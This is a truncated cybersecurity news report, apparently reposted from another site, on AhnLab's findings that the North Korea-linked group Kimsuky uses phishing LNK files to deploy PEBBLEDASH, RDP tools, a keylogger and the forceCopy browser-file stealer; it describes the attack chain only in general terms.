North Korea-linked hacking group Kimsuky has been identified conducting targeted spear-phishing campaigns to distribute an information stealer known as forceCopy, according to the latest findings from the AhnLab Security Intelligence Center (ASEC).
The cyberattacks begin with phishing emails that contain a Windows shortcut (LNK) file, disguised as a Microsoft Office or PDF document. Once opened, the file executes PowerShell or mshta.exe, a legitimate Microsoft binary used to run HTML Application (HTA) files. This process facilitates the download and execution of additional malware from an external source.
According to ASEC, the attack chain ultimately results in the deployment of PEBBLEDASH, a well-known trojan, and a customized version of the RDP Wrapper, an open-source Remote Desktop utility.
Additionally, the attackers utilize proxy malware, which enables them to maintain persistent Remote Desktop Protocol (RDP) communication with external networks.
Kimsuky has also been observed employing a PowerShell-based keylogger to capture keystrokes and a new stealer malware, forceCopy, designed to extract files from directories linked to web browsers.
“All of the paths where the malware is installed are web browser installation paths,” ASEC noted. “It is assumed tha
[…]
Content was cut in order to protect the source.Please visit the source for the rest of the article.
[…]
Content was cut in order to protect the source.Please visit the source for the rest of the article.
This article has been indexed from CySecurity News – Latest Information Security and Hacking Incidents
Read the original article: